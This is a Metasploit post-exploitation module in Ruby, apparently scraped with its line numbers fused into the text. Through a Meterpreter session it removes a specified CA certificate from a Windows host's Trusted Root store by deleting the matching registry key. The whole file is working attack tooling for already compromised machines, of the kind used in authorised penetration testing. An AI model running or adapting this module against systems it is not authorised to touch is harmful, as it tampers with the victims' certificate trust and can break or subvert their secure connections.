Path: blob/master/modules/post/windows/manage/remove_ca.rb
19516 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post67def initialize(info = {})8super(9update_info(10info,11'Name' => 'Windows Manage Certificate Authority Removal',12'Description' => %q{13This module removes the specified CA certificate from the14system Trusted Root store.15},16'License' => BSD_LICENSE,17'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],18'Platform' => [ 'win' ],19'SessionTypes' => [ 'meterpreter' ],20'Compat' => {21'Meterpreter' => {22'Commands' => %w[23stdapi_registry_open_key24]25}26},27'Notes' => {28'Stability' => [CRASH_SAFE],29'SideEffects' => [CONFIG_CHANGES],30'Reliability' => []31}32)33)3435register_options(36[37OptString.new('CERTID', [ true, 'SHA1 hash of the certificate to remove.', '']),38]39)40end4142def run43certtoremove = datastore['CERTID']4445key = 'HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\ROOT\\Certificates'46rkey, bkey = client.sys.registry.splitkey(key)4748# Check if the requested cert is actually in the registry to start with49open_key = client.sys.registry.open_key(rkey, bkey, KEY_READ + 0x0000)50keys = open_key.enum_key5152if (keys.length <= 1)53print_error('These are not the CAs you are looking for (i.e. this registry branch is empty)')54return55end5657unless keys.include?(certtoremove)58print_error('The specified CA is not in the registry.')59return60end6162open_key = client.sys.registry.open_key(rkey, bkey, KEY_WRITE + 0x0000)63open_key.delete_key(certtoremove)64print_good("Successfully deleted CA: #{certtoremove}")65end66end676869